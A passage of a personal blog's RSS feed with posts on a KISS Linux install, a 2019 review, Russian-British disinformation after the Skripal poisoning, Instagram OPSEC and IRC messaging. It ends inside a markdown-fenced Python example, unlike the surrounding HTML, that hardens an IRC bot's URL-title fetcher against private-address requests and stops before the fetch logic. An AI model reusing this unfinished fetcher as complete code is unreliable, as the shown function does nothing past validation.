1369enough. The culprit this time was a missing <code>xf86-xorg-input</code> package.
1370Installing that gave me my mouse back, but not the keyboard!</p>
1371
1372<p>It was definitely not the kernel this time, because I had a working
1373keyboard in the TTY. </p>
1374
1375<h3 id="day-4-day-5">Day 4 & Day 5</h3>
1376
1377<p>This was probably the most annoying of all, since the fix was <em>trivial</em>.
1378By this point I had exhausted all ideas, so I decided to build my
1379essential packages and set up my system. Building Firefox took nearly
13809 hours; the other stuff was much faster.</p>
1381
1382<p>I was still chatting on IRC during this, trying to zero in on what the
1383problem could be. And then:</p>
1384
1385<pre><code>&lt;dylanaraps&gt; For starters I think st fails due to no fonts.
1386</code></pre>
1387
1388<p>Holy shit! Fonts. I hadn’t installed <em>any</em> fonts. Which is why none of
1389the applications I tried launching via <code>sowm</code> ever launched, and hence,
1390I was led to believe my keyboard was dead.</p>
1391
1392<h2 id="worth-it">Worth it?</h2>
1393
1394<p>Absolutely. I <em>cannot</em> stress enough how much of a learning experience this
1395was. Also a test of my patience and perseverance, but yeah ok. I also
1396think that this distro is my endgame (yeah, right), probably because
1397other distros will be nothing short of disappointing, in one way or
1398another.</p>
1399
1400<p>Huge thanks to the folks at <code>#kisslinux</code> on Freenode for helping me
1401throughout. And I mean, they <em>really</em> did. We chatted for hours on end
1402trying to debug my issues.</p>
1403
1404<p>I’ll now conclude with an obligatory screenshot.</p>
1405
1406<p><img src="https://x.icyphox.sh/R6G.png" alt="scrot" /></p>
1407
1408<div class="footnotes">
1409<hr />
1410<ol>
1411<li id="fn-hn">
1412<p><a href="https://news.ycombinator.com/item?id=21021396">https://news.ycombinator.com/item?id=21021396</a> <a href="#fnref-hn" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
1413</li>
1414</ol>
1415</div>
1416]]></description><link>https://icyphox.sh/blog/five-days-tty</link><pubDate>Mon, 13 Jan 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/five-days-tty</guid></item><item><title>2019 in review</title><description><![CDATA[<p>Just landed in a rainy Chennai, back on campus for my 6th semester.
1417A little late to the “year in review blog post” party; travel took up
1418most of my time. Last year was pretty eventful (at least in my books),
1419and I think I did a bunch of cool stuff—let’s see!</p>
1420
1421<h2 id="interning-at-securelayer7">Interning at SecureLayer7</h2>
1422
1423<p>Last summer, I interned at <a href="https://securelayer7.net">SecureLayer7</a>,
1424a security consulting firm in Pune, India. My work was mostly in
1425hardware and embedded security research. I learnt a ton about ARM and
1426MIPS reversing and exploitation, UART and JTAG, firmware RE and
1427enterprise IoT security.</p>
1428
1429<p>I also earned my first CVE! I’ve written about it in detail
1430<a href="/blog/fb50">here</a>.</p>
1431
1432<h2 id="conferences">Conferences</h2>
1433
1434<p>I attended two major conferences last year—Nullcon Goa and PyCon
1435India. Both super fun experiences and I met a ton of cool people!
1436<a href="https://twitter.com/icyphox/status/1101022604851212288">Nullcon Twitter thread</a>
1437and <a href="/blog/pycon-wrap-up">PyCon blog post</a>.</p>
1438
1439<h2 id="talks">Talks</h2>
1440
1441<p>I gave two talks last year:</p>
1442
1443<ol>
1444<li><em>Intro to Reverse Engineering</em> at Cyware 2019</li>
1445<li><em>"Smart lock? Nah dude."</em> at PyCon India</li>
1446</ol>
1447
1448<h2 id="things-i-made">Things I made</h2>
1449
1450<p>Not in order, because I CBA:</p>
1451
1452<ul>
1453<li><a href="https://github.com/icyphox/repl">repl</a>: More of a quick bash hack,
1454I don’t really use it.</li>
1455<li><a href="https://github.com/icyphox/pw">pw</a>: A password manager. This,
1456I actually do use. I’ve even written a tiny
1457<a href="https://github.com/icyphox/dotfiles/blob/master/bin/pwmenu.sh"><code>dmenu</code> wrapper</a>
1458for it. </li>
1459<li><a href="https://github.com/icyphox/twsh">twsh</a>: An incomplete twtxt client,
1460in bash. I have yet to get around to finishing it.</li>
1461<li><a href="https://github.com/icyphox/alpine">alpine ports</a>: My APKBUILDs for
1462Alpine.</li>
1463<li><a href="https://github.com/icyphox/detotated">detotated</a>: An IRC bot written
1464in Python. See <a href="/blog/irc-for-dms">IRC for DMs</a>.</li>
1465<li><a href="https://github.com/icyphox/icyrc">icyrc</a>: A no bullshit IRC client,
1466because WeeChat is bloat.</li>
1467</ul>
1468
1469<p>I probably missed something, but whatever.</p>
1470
1471<h2 id="blog-posts">Blog posts</h2>
1472
1473<pre><code>$ ls -1 pages/blog/*.md | wc -l
147420
1475</code></pre>
1476
1477<p>So excluding today’s post, and <code>_index.md</code>, that’s 18 posts! I had
1478initially planned to write one post a month, but hey, this is great. My
1479plan for 2020 is to write one post a <em>week</em>—unrealistic, I know, but
1480I will try nevertheless.</p>
1481
1482<p>I wrote about a bunch of things, ranging from programming to
1483return-oriented-programming (heh), sysadmin and security stuff, and
1484a hint of culture and philosophy. Nice!</p>
1485
1486<p>The <a href="/blog/python-for-re-1">Python for Reverse Engineering</a> post got
1487a ton of attention on the interwebz, so that was cool.</p>
1488
1489<h2 id="bye-2019">Bye 2019</h2>
1490
1491<p>2019 was super productive! (in my terms). I learnt a lot of new things
1492last year, and I can only hope to learn as much in 2020. :)</p>
1493
1494<p>I’ll see you next week.</p>
1495]]></description><link>https://icyphox.sh/blog/2019-in-review</link><pubDate>Thu, 02 Jan 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/2019-in-review</guid></item><item><title>Disinfo war&#58; RU vs GB</title><description><![CDATA[<p>This entire sequence of events begins with the attempted poisoning of
1496Sergei Skripal<sup class="footnote-ref" id="fnref-skripal"><a href="#fn-skripal">1</a></sup>, an ex-GRU officer who was a double-agent for
1497the UK’s intelligence services. This hit attempt happened on the 4th of
1498March, 2018. 8 days later, then-Prime Minister Theresa May formally
1499accused Russia of the attack.</p>
1500
1501<p>The toxin used in the poisoning was a nerve agent called <em>Novichok</em>.
1502In addition to the British military-research facility at Porton Down,
1503a small number of labs around the world were tasked by the OPCW
1504(Organisation for the Prohibition of Chemical Weapons) with confirming
1505Porton Down’s conclusions on the toxin that was used.</p>
1506
1507<p>With the background on the matter out of the way, here are the different
1508instances of well timed disinformation pushed out by Moscow.</p>
1509
1510<h2 id="the-russian-offense">The Russian offense</h2>
1511
1512<h3 id="april-14-2018">April 14, 2018</h3>
1513
1514<ul>
1515<li>RT published an article claiming that Spiez had identified a different
1516toxin—BZ, and not Novichok.</li>
1517<li>This was an attempt to shift the blame from Russia (origin of Novichok),
1518to NATO countries, where it was apparently in use.</li>
1519<li>Most viral piece on the matter in all of 2018.</li>
1520</ul>
1521
1522<p>Although technically correct, this isn’t the entire truth. As part of
1523protocol, the OPCW added a new substance to the sample as a test. If any
1524of the labs failed to identify this substance, their findings were
1525deemed untrustworthy. This toxin was a derivative of BZ.</p>
1526
1527<p>Here are a few interesting things to note:</p>
1528
1529<ol>
1530<li>The entire process starting with the OPCW and the labs is top-secret.
1531How did Russia even know Spiez was one of the labs?</li>
1532<li>On April 11th, the OPCW mentioned BZ in a report confirming Porton
1533Down’s findings. Note that Russia is a part of the OPCW, and is fully
1534aware of the quality control measures in place. Surely they knew
1535about the reason for BZ’s use?</li>
1536</ol>
1537
1538<p>Regardless, the Russian version of the story spread fast. They cashed in
1539on two major factors to plant this disinfo:</p>
1540
1541<ol>
1542<li>“NATO bad” : Overused, but surprisingly works. People love a story
1543that goes full 180°.</li>
1544<li>Spiez can’t defend itself: At the risk of revealing that it was one
1545of the facilities testing the toxin, Spiez was only able to “not
1546comment”.</li>
1547</ol>
1548
1549<h3 id="april-3-2018">April 3, 2018</h3>
1550
1551<ul>
1552<li>The Independent publishes a story based on an interview with the chief
1553executive of Porton Down, Gary Aitkenhead.</li>
1554<li>Aitkenhead says they’ve identified Novichok but “have not identified
1555the precise source”.</li>
1556<li>Days earlier, Boris Johnson (then-Foreign Secretary) claimed that
1557Porton Down confirmed the origin of the toxin to be Russia.</li>
1558<li>This discrepancy was immediately promoted by Moscow, and its network
1559all over.</li>
1560</ul>
1561
1562<p>This one is especially interesting because of how <em>simple</em> it is to
1563exploit a small contradiction that could’ve been an honest mistake.
1564This episode is also interesting because the British actually attempted
1565damage control this time. Porton Down tried to clarify Aitkenhead’s
1566statement via a tweet<sup class="footnote-ref" id="fnref-dstltweet"><a href="#fn-dstltweet">2</a></sup>:</p>
1567
1568<blockquote>
1569 <p>Our experts have precisely identified the nerve agent as a Novichok.
1570 It is not, and has never been, our responsibility to confirm the source
1571 of the agent @skynews @UKmoments</p>
1572</blockquote>
1573
1574<p>Quoting the <a href="https://www.defenseone.com/threats/2019/12/britains-secret-war-russia/161665/">Defense One</a>
1575article on the matter:</p>
1576
1577<blockquote>
1578 <p>The episode is seen by those inside Britain’s security communications team
1579 as the most serious misstep of the crisis, which for a period caused real
1580 concern. U.K. officials told me that, in hindsight, Aikenhead could never
1581 have blamed Russia directly, because that was not his job—all he was
1582 qualified to do was identify the chemical. Johnson, in going too far,
1583 was more damaging. Two years on, he is now prime minister.</p>
1584</blockquote>
1585
1586<h3 id="may-2018">May 2018</h3>
1587
1588<ul>
1589<li>OPCW facilities receive an email from Spiez inviting them to
1590a conference.</li>
1591<li>The conference itself is real, and has been organized before.</li>
1592<li>The email however, was not—attached was a Word document containing
1593malware.</li>
1594<li>The email’s formatting also deviated from what was
1595normal.</li>
1596</ul>
1597
1598<p>This spearphishing campaign was never officially attributed to Moscow,
1599but there are a lot of tells here that point to it being the work of
1600a state actor:</p>
1601
1602<ol>
1603<li>Attack targeting a specific group of individuals.</li>
1604<li>Relatively high level of sophistication—email formatting,
1605malicious Word doc, etc.</li>
1606</ol>
1607
1608<p>However, the British NCSC have deemed with “high confidence” that the
1609attack was perpetrated by GRU. In the UK intelligence parlance, “highly
1610likely” / “high confidence” usually means “definitely”.</p>
1611
1612<h2 id="britains-defense">Britain’s defense</h2>
1613
1614<h3 id="september-5-2018">September 5, 2018</h3>
1615
1616<p>The UK took a lot of hits in 2018, but they eventually came back:</p>
1617
1618<ul>
1619<li>Metropolitan Police has a meeting with the press, releasing their
1620findings.</li>
1621<li>CCTV footage showing the two Russian hitmen was released.</li>
1622<li>Traces of Novichok identified in their hotel room.</li>
1623</ul>
1624
1625<p>This sudden news explosion from Britain’s side completely
1626bulldozed the information space pertaining to the entire event.
1627According to Defense One:</p>
1628
1629<blockquote>
1630 <p>Only two of the 10 most viral stories in the weeks following the announcement
1631 were sympathetic to Russia, according to NewsWhip. Finally, officials recalled,
1632 it felt as though the U.K. was the aggressor. “This was all kept secret to
1633 put the Russians on the hop,” one told me. “Their response was all over the
1634 place from this point. It was the turning point.”</p>
1635</blockquote>
1636
1637<p>Earlier in April, 4 GRU agents were arrested in the Netherlands, where
1638they had come to execute a cyber operation against the OPCW (located in The
1639Hague) via its WiFi networks. They were arrested by Dutch security,
1640and later identified as belonging to Unit 26165. The Dutch also seized a bunch
1641of equipment from their room and their car.</p>
1642
1643<blockquote>
1644 <p>The abandoned equipment revealed that the GRU unit involved had sent
1645 officers around the world to conduct similar cyberattacks. They had
1646 been in Malaysia trying to steal information about the investigation
1647 into the downed Malaysia Airlines Flight 17, and at a hotel in Lausanne,
1648 Switzerland, where a World Anti-Doping Agency (WADA) conference was taking
1649 place as Russia faced sanctions from the International Olympic Committee.
1650 Britain has said that the same GRU unit attempted to compromise Foreign
1651 Office and Porton Down computer systems after the Skripal poisoning.</p>
1652</blockquote>
1653
1654<h3 id="october-4-2018">October 4, 2018</h3>
1655
1656<p>The UK made the arrests public, and published a list of infractions committed by
1657Russia, along with the specific GRU unit that was caught.</p>
1658
1659<p>During this period, just one of the top 25 viral stories was from
1660a pro-Russian outlet, RT—that too a fairly straightforward piece.</p>
1661
1662<h2 id="wrapping-up">Wrapping up</h2>
1663
1664<p>As with conventional warfare, it’s hard to determine who won. Britain
1665may have had the last blow, but Moscow—yet again—displayed their
1666finesse in information warfare. Their ability to seize unexpected
1667openings, gather intel to facilitate their disinformation campaigns, and
1668their cyber capabilities make them a formidable threat.</p>
1669
1670<p>2020 will be fun, to say the least.</p>
1671
1672<div class="footnotes">
1673<hr />
1674<ol>
1675<li id="fn-skripal">
1676<p><a href="https://en.wikipedia.org/wiki/Sergei_Skripal">https://en.wikipedia.org/wiki/Sergei_Skripal</a> <a href="#fnref-skripal" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
1677</li>
1678
1679<li id="fn-dstltweet">
1680<p><a href="https://twitter.com/dstlmod/status/981220158680260613">https://twitter.com/dstlmod/status/981220158680260613</a> <a href="#fnref-dstltweet" class="footnoteBackLink" title="Jump back to footnote 2 in the text.">↩</a></p>
1681</li>
1682</ol>
1683</div>
1684]]></description><link>https://icyphox.sh/blog/ru-vs-gb</link><pubDate>Thu, 12 Dec 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/ru-vs-gb</guid></item><item><title>Instagram OPSEC</title><description><![CDATA[<p>Which I am not, of course. But seeing as most of my peers are, I am
1685compelled to write this post. Using a social platform like Instagram
1686automatically implies that the user understands (to some level) that
1687their personally identifiable information is exposed publicly, and they
1688sign up for the service understanding this risk—or I think they do,
1689anyway. But that’s about it, they go ham after that. Sharing every nitty
1690gritty detail of their private lives without understanding the potential
1691risks of doing so.</p>
1692
1693<p>The fundamentals of OPSEC dictate that you develop a threat model, and
1694Instagrammers are <em>obviously</em> incapable of doing that—so I’ll do it
1695for them.</p>
1696
1697<h2 id="your-average-instagrammers-threat-model">Your average Instagrammer’s threat model</h2>
1698
1699<p>I stress the word “average”, as in this doesn’t apply to those with
1700more than a couple thousand followers. Those types of accounts inherently
1701face different kinds of threats—those that come with having
1702a celebrity status—and are not in scope of this analysis.</p>
1703
1704<ul>
1705<li><p><strong>State actors</strong>: This doesn’t <em>really</em> fit into our threat model,
1706since our target demographic is simply not important enough. That said,
1707there are select groups of individuals that operate on
1708Instagram<sup class="footnote-ref" id="fnref-ddepisode"><a href="#fn-ddepisode">1</a></sup>, and they can potentially be targeted by a state
1709actor.</p></li>
1710<li><p><strong>OSINT</strong>: This is probably the biggest threat vector, simply because
1711of the amount of visual information shared on the platform. A lot can be
1712gleaned from one simple picture in a nondescript alleyway. We’ll get
1713into this in the DOs and DON’Ts in a bit.</p></li>
1714<li><p><strong>Facebook & LE</strong>: Instagram is the last place you want to be doing anything
1715illegal, because well, it’s logged and more importantly—not
1716end-to-end encrypted. Law enforcement can subpoena any and all account
1717information. Quoting Instagram’s
1718<a href="https://help.instagram.com/494561080557017">page on this</a>:</p></li>
1719</ul>
1720
1721<blockquote>
1722 <p>a search warrant issued under the procedures described in the Federal
1723 Rules of Criminal Procedure or equivalent state warrant procedures
1724 upon a showing of probable cause is required to compel the disclosure
1725 of the stored contents of any account, which may include messages,
1726 photos, comments, and location information.</p>
1727</blockquote>
1728
1729<p>That out of the way, here’s a list of DOs and DON’Ts to keep in mind
1730while posting on Instagram.</p>
1731
1732<h3 id="donts">DON’Ts</h3>
1733
1734<ul>
1735<li><p>Use Instagram for planning and orchestrating illegal shit! I’ve
1736explained why this is a terrible idea above. Use secure comms—even
1737WhatsApp is a better choice, if you have nothing else. In fact, try
1738avoiding IG DMs altogether, use alternatives that implement E2EE.</p></li>
1739<li><p>Film live videos outside. Or try not to, if you can. You might
1740unknowingly include information about your location: street signs,
1741shops etc. These can be used to ascertain your current location.</p></li>
1742<li><p>Film live videos in places you visit often. This compromises your
1743security at places you’re bound to be at.</p></li>
1744<li><p>Share your flight ticket in your story! I can’t stress this enough!!!
1745Summer/winter break? “Look guys, I’m going home! Here’s where I live,
1746and here’s my flight number—feel free to track me!”. This scenario is
1747especially worrisome because the start and end points are known to the
1748threat actor, and your arrival time can be trivially looked up—thanks
1749to the flight number on your ticket. So, just don’t.</p></li>
1750<li><p>Post screenshots with OS specific details. This might border on
1751pedantic, but better safe than sorry. Your phone’s statusbar and navbar
1752are better cropped out of pictures. They reveal the time, notifications
1753(apps that you use), and can be used to identify your phone’s operating
1754system. Besides, the status/nav bar isn’t very useful to your screenshot
1755anyway.</p></li>
1756<li><p>Share your voice. In general, reduce your footprint on the platform
1757that can be used to identify you elsewhere.</p></li>
1758<li><p>Think you’re safe if your account is set to private. It doesn’t take
1759much to get someone who follows you to show your profile on their
1760device.</p></li>
1761</ul>
1762
1763<h3 id="dos">DOs</h3>
1764
1765<ul>
1766<li><p>Post pictures that pertain to a specific location, once you’ve moved
1767out of the location. Also applies to stories. It can wait.</p></li>
1768<li><p>Post pictures that have been shot indoors. Or try to; reasons above.
1769Who woulda thunk I’d advocate bathroom selfies?</p></li>
1770<li><p>Delete old posts that are irrelevant to your current audience. Your
1771friends at work don’t need to know about where you went to high school.</p></li>
1772</ul>
1773
1774<p>More DON’Ts than DOs, that’s very telling. Here are a few more points
1775that are good OPSEC practices in general:</p>
1776
1777<ul>
1778<li><strong>Think before you share</strong>. Does it conform to the rules mentioned above?</li>
1779<li><strong>Compartmentalize</strong>. Separate as much as you can from what you share
1780online, from what you do IRL. Limit information exposure.</li>
1781<li><strong>Assess your risks</strong>: Do this often. People change, your environments
1782change, and consequently the risks do too.</li>
1783</ul>
1784
1785<h2 id="fin">Fin</h2>
1786
1787<p>Instagram is—much to my dismay—far too popular for it to die any
1788time soon. There are plenty of good reasons to stop using the platform
1789altogether (hint: Facebook), but that’s a discussion for another day.</p>
1790
1791<p>Or be like me:</p>
1792
1793<p><img src="/static/img/ig.jpg" alt="0 posts lul" /></p>
1794
1795<p>And that pretty much wraps it up, with a neat little bow.</p>
1796
1797<div class="footnotes">
1798<hr />
1799<ol>
1800<li id="fn-ddepisode">
1801<p><a href="https://darknetdiaries.com/episode/51/">https://darknetdiaries.com/episode/51/</a>—Jack talks about Indian hackers who operate on Instagram. <a href="#fnref-ddepisode" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
1802</li>
1803</ol>
1804</div>
1805]]></description><link>https://icyphox.sh/blog/ig-opsec</link><pubDate>Mon, 02 Dec 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/ig-opsec</guid></item><item><title>Save .ORG!</title><description><![CDATA[<p>The .ORG top-level domain, introduced in 1985, has been operated by the
1806<a href="https://en.wikipedia.org/wiki/Public_Interest_Registry">Public Interest Registry</a> since
18072003. The .ORG TLD is used primarily by communities, free and open source projects,
1808and other non-profit organizations—although the use of the TLD isn’t
1809restricted to non-profits.</p>
1810
1811<p>The Internet Society or ISOC, the group that created the PIR, has
1812decided to sell the registry over to a private equity firm—Ethos
1813Capital.</p>
1814
1815<h2 id="whats-the-problem">What’s the problem?</h2>
1816
1817<p>There are around 10 million .ORG domains registered, and a good portion of
1818them are non-profits and non-governmental organizations. As the name
1819suggests, they don’t earn any profits and all their operations rely on
1820a thin inflow of donations. A private firm having control of the .ORG
1821domain gives them the power to make decisions that would be unfavourable
1822to the .ORG community:</p>
1823
1824<ul>
1825<li><p>They control the registration/renewal fees of the TLD. They can
1826hike the price if they wish to. As it stands, NGOs already earn very
1827little—a .ORG price hike would put them in a very icky situation.</p></li>
1828<li><p>They can introduce <a href="https://www.icann.org/resources/pages/rpm-drp-2017-10-04-en">Rights Protection
1829Mechanisms</a>
1830or RPMs, which are essentially legal statements that can—if not
1831correctly developed—jeopardize / censor completely legal non-profit
1832activities.</p></li>
1833<li><p>Lastly, they can suspend domains at the whim of state actors. It isn’t
1834news that nation states go after NGOs, targeting them with allegations
1835of illegal activity. The registry being a private firm only simplifies
1836the process.</p></li>
1837</ul>
1838
1839<p>Sure, these are just “what ifs” and speculations, but the risk is real.
1840Such power can be abused and this would be severely detrimental to NGOs
1841globally.</p>
1842
1843<h2 id="how-can-i-help">How can I help?</h2>
1844
1845<p>We need to get the ISOC to <strong>stop the sale</strong>. Head over to
1846<a href="https://savedotorg.org">https://savedotorg.org</a> and sign their letter. An email is sent on your
1847behalf to:</p>
1848
1849<ul>
1850<li>Andrew Sullivan, CEO, ISOC</li>
1851<li>Jon Nevett, CEO, PIR</li>
1852<li>Maarten Botterman, Board Chair, ICANN</li>
1853<li>Göran Marby, CEO, ICANN</li>
1854</ul>
1855
1856<h2 id="closing-thoughts">Closing thoughts</h2>
1857
1858<p>The Internet that we all love and care for is slowly being subsumed by
1859megacorps and private firms, whose only motive is to make a profit. The
1860Internet was meant to be free, and we’d better act now if we want that
1861freedom. The future looks bleak—I hope we aren’t too late.</p>
1862]]></description><link>https://icyphox.sh/blog/save-org</link><pubDate>Sat, 23 Nov 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/save-org</guid></item><item><title>Status update</title><description><![CDATA[<p>This month is mostly just unfun stuff, lined up in a neat schedule –
1863exams. I get all these cool ideas for things to do, and it’s always
1864during exams. Anyway, here’s a quick update on what I’ve been up to.</p>
1865
1866<h2 id="blog-post-queue">Blog post queue</h2>
1867
1868<p>I realized that I could use this site’s
1869<a href="https://github.com/icyphox/site">repo</a>’s issues to track blog post ideas.
1870I’ve made a few, mostly just porting them over from my Google Keep note.</p>
1871
1872<p>This method of using issues is great, because readers can chime in with
1873ideas for things I could possibly discuss—like in <a href="https://github.com/icyphox/site/issues/10">this
1874issue</a>.</p>
1875
1876<h2 id="contemplating-a-vite-rewrite">Contemplating a <code>vite</code> rewrite</h2>
1877
1878<p><a href="https://github.com/icyphox/vite"><code>vite</code></a>, despite what the name suggests
1879– is awfully slow. Also, Python is bloat.
1880Will rewriting it fix that? That’s what I plan to find out. I have
1881a couple of choices of languages to use in the rewrite:</p>
1882
1883<ul>
1884<li>C: Fast, compiled. Except I suck at it. (<code>cite</code>?)</li>
1885<li>Nim: My favourite, but I’ll have to write bindings to <a href="https://github.com/kristapsdz/lowdown"><code>lowdown(1)</code></a>. (<code>nite</code>?)</li>
1886<li>Shell: Another favourite, muh “minimalism”. No downside, really.
1887(<code>shite</code>?)</li>
1888</ul>
1889
1890<p>Oh, and did I mention—I want it to be compatible with <code>vite</code>.
1891I don’t want to have to redo my site structure or its templates. At the
1892moment, I rely on Jinja2 for templating, so I’ll need something similar.</p>
1893
1894<h2 id="irc-bot">IRC bot</h2>
1895
1896<p>My earlier post on <a href="/blog/irc-for-dms">IRC for DMs</a> got quite a bit of
1897traction, which was pretty cool. I didn’t really talk much about the bot
1898itself though; I’m dedicating this section to
1899<a href="https://github.com/icyphox/detotated">detotated</a>.<sup class="footnote-ref" id="fnref-1"><a href="#fn-1">1</a></sup></p>
1900
1901<p>Fairly simple Python code, using plain sockets. So far, we’ve got a few
1902basic features in place:</p>
1903
1904<ul>
1905<li><code>.np</code> command: queries the user’s last.fm to get the currently playing
1906track</li>
1907<li>Fetches the URL title, when a URL is sent in chat</li>
1908</ul>
1909
1910<p>That’s it, really. I plan to add a <code>.nps</code>, or “now playing Spotify”
1911command, since we share Spotify links pretty often.</p>
1912
1913<h2 id="other">Other</h2>
1914
1915<p>I’ve been reading some more manga, I’ll update the <a href="/reading">reading
1916log</a> when I, well… get around to it. Haven’t had time to do
1917much in the past few weeks—the time at the end of a semester tends to
1918get pretty tight. Here’s what I plan to get back to during this winter break:</p>
1919
1920<ul>
1921<li>Russian!</li>
1922<li>Window manager in Nim</li>
1923<li><code>vite</code> rewrite, probably</li>
1924<li>The other blog posts in queue</li>
1925</ul>
1926
1927<p>I’ve also put off doing any “security work” for a while now, perhaps
1928that’ll change this December. Or whenever.</p>
1929
1930<p>With that ends my status update, on all things that I <em>haven’t</em> done.</p>
1931
1932<div class="footnotes">
1933<hr />
1934<ol>
1935<li id="fn-1">
1936<p><a href="https://knowyourmeme.com/memes/dedotated-wam">https://knowyourmeme.com/memes/dedotated-wam</a> (dead meme, yes I know) <a href="#fnref-1" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
1937</li>
1938</ol>
1939</div>
1940]]></description><link>https://icyphox.sh/blog/2019-11-16</link><pubDate>Sat, 16 Nov 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/2019-11-16</guid></item><item><title>IRC for DMs</title><description><![CDATA[<p><a href="https://nerdypepper.me">Nerdy</a> and I decided to try and use IRC for our
1941daily communications, as opposed to non-free alternatives like WhatsApp
1942or Telegram. This is an account of how that went.</p>
1943
1944<h2 id="the-status-quo-of-instant-messaging-apps">The status quo of instant messaging apps</h2>
1945
1946<p>I’ve tried a <em>ton</em> of messaging applications—Signal, WhatsApp,
1947Telegram, Wire, Jami (Ring), Matrix, Slack, Discord and more recently, DeltaChat.</p>
1948
1949<p><strong>Signal</strong>: It straight up sucks on Android. Not to mention the
1950centralized architecture, and OWS’s refusal to federate.</p>
1951
1952<p><strong>WhatsApp</strong>: Facebook’s spyware that people use without a second
1953thought. The sole reason I have it installed is for University’s
1954class groups; I can’t wait to graduate.</p>
1955
1956<p><strong>Telegram</strong>: Centralized architecture and a closed-source server. It’s
1957got a very nice Android client, though.</p>
1958
1959<p><strong>Jami</strong>: Distributed platform, free software. I am not going to comment
1960on this because I don’t recall what my experience was like, but I’m not
1961using it now… so if that’s indicative of anything.</p>
1962
1963<p><strong>Matrix (Riot)</strong>: Distributed network. Multiple client implementations.
1964Overall, pretty great, but it’s slow. I’ve had messages not send / not
1965received a lot of times. Matrix + Riot excels in group communication, but
1966really sucks for one-to-one chats.</p>
1967
1968<p><strong>Slack</strong> / <strong>Discord</strong>: <em>sigh</em></p>
1969
1970<p><strong>DeltaChat</strong>: Pretty interesting idea—on paper. Using existing email
1971infrastructure for IM sounds great, but it isn’t all that cash in
1972practice. Email isn’t instant, there’s always a delay of give or take
19735 to 10 seconds, if not more. This affects the flow of conversation.
I might write a small blog post later, reviewing DeltaChat.<sup class="footnote-ref" id="fnref-deltachat"><a href="#fn-deltachat">2</a></sup></p>
1975
1976<h2 id="why-irc">Why IRC?</h2>
1977
1978<p>It’s free, in all senses of the word. A lot of others have done a great
1979job of answering this question in further detail, this is by far my
1980favourite:</p>
1981
1982<p><a href="https://drewdevault.com/2019/07/01/Absence-of-features-in-IRC.html">https://drewdevault.com/2019/07/01/Absence-of-features-in-IRC.html</a></p>
1983
1984<h2 id="using-ircs-private-messages">Using IRC’s private messages</h2>
1985
1986<p>This was the next obvious choice, but personal message buffers don’t
1987persist in ZNC and it’s very annoying to have to do a <code>/query
1988nerdypepper</code> (Weechat) or to search and message a user via Revolution
1989IRC. The only unexplored option—using a channel.</p>
1990
1991<h2 id="setting-up-a-channel-for-dms">Setting up a channel for DMs</h2>
1992
1993<p>A fairly easy process:</p>
1994
1995<ul>
1996<li><p>Set modes (on Rizon)<sup class="footnote-ref" id="fnref-modes"><a href="#fn-modes">1</a></sup>:</p>
1997
1998<pre><code>#crimson [+ilnpstz 3]
1999</code></pre>
2000
2001<p>In essence, this limits the users to 3 (one bot), sets the channel to invite only,
2002hides the channel from <code>/whois</code> and <code>/list</code>, and a few other misc.
2003modes.</p></li>
2004<li><p>Notifications: Also a trivial task; a quick modification to <a href="https://weechat.org/scripts/source/lnotify.py.html/">lnotify.py</a>
2005to send a notification for all messages in the specified buffer
2006(<code>#crimson</code>) did the trick for Weechat. Revolution IRC, on the other
hand, has an option to set up rules for notifications—super
2008convenient.</p></li>
2009<li><p>A bot: Lastly, a bot for a few small tasks—fetching URL titles, responding
2010to <code>.np</code> (now playing) etc. Writing an IRC bot is dead simple, and it
2011took me about an hour or two to get most of the basic functionality in
2012place. The source is <a href="https://github.com/icyphox/detotated">here</a>.
2013It is by no means “good code”; it breaks spectacularly from time to
2014time.</p></li>
2015</ul>
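<p>The URL-title feature is the part of such a bot worth hardening: a bot that fetches every link pasted into the channel will, unless told otherwise, also request loopback and private addresses, follow redirects anywhere and read responses of any size. Here is an added example of a title fetcher that validates the URL first (my own code, not <code>detotated</code>’s; the names <code>check_url</code>, <code>extract_title</code>, <code>fetch_title</code> and <code>MAX_BYTES</code> are mine):</p>

```python
"""Hardened URL-title fetcher for an IRC bot.

Added example (not detotated's code). Every URL, including each redirect
hop, goes through check_url() before a request is made, only HTML is
parsed for a title, and the body read is capped at MAX_BYTES.
"""
import html
import ipaddress
import re
import socket
import sys
import urllib.request
from typing import Callable, Optional
from urllib.parse import urlsplit

MAX_BYTES = 64 * 1024                     # read at most 64 KiB of any response
ALLOWED_SCHEMES = {"http", "https"}
TITLE_RE = re.compile(rb"<title[^>]*>(.*?)</title>", re.IGNORECASE | re.DOTALL)


def is_public_address(ip: str) -> bool:
    """True only for globally routable unicast addresses (v4 or v6)."""
    addr = ipaddress.ip_address(ip)
    return addr.is_global and not addr.is_multicast


def check_url(url: str, resolver: Callable[[str], str] = socket.gethostbyname) -> str:
    """Validate a chat-pasted URL; return its host name or raise ValueError.

    `resolver` is injectable so the check can be exercised offline.
    Caveat: the connection later resolves the name again, so a rebinding
    DNS server could still win that race; connecting to the checked IP
    would close the gap.
    """
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if parts.username or parts.password:
        raise ValueError("credentials in URL are not allowed")
    host = parts.hostname
    if not host:
        raise ValueError("missing host")
    ip = resolver(host)
    if not is_public_address(ip):
        raise ValueError(f"{host} resolves to non-public address {ip}")
    return host


def extract_title(body: bytes, charset: str = "utf-8") -> Optional[str]:
    """Return the first <title> text in (possibly truncated) HTML, whitespace-collapsed."""
    m = TITLE_RE.search(body)
    if not m:
        return None
    text = html.unescape(m.group(1).decode(charset, errors="replace"))
    return " ".join(text.split()) or None


class _CheckedRedirects(urllib.request.HTTPRedirectHandler):
    """Re-run check_url on every redirect target before following it."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        check_url(newurl)
        return super().redirect_request(req, fp, code, msg, headers, newurl)


_opener = urllib.request.build_opener(_CheckedRedirects)


def fetch_title(url: str, timeout: float = 5.0) -> Optional[str]:
    """Fetch a URL seen in chat and return its page title, or None."""
    check_url(url)
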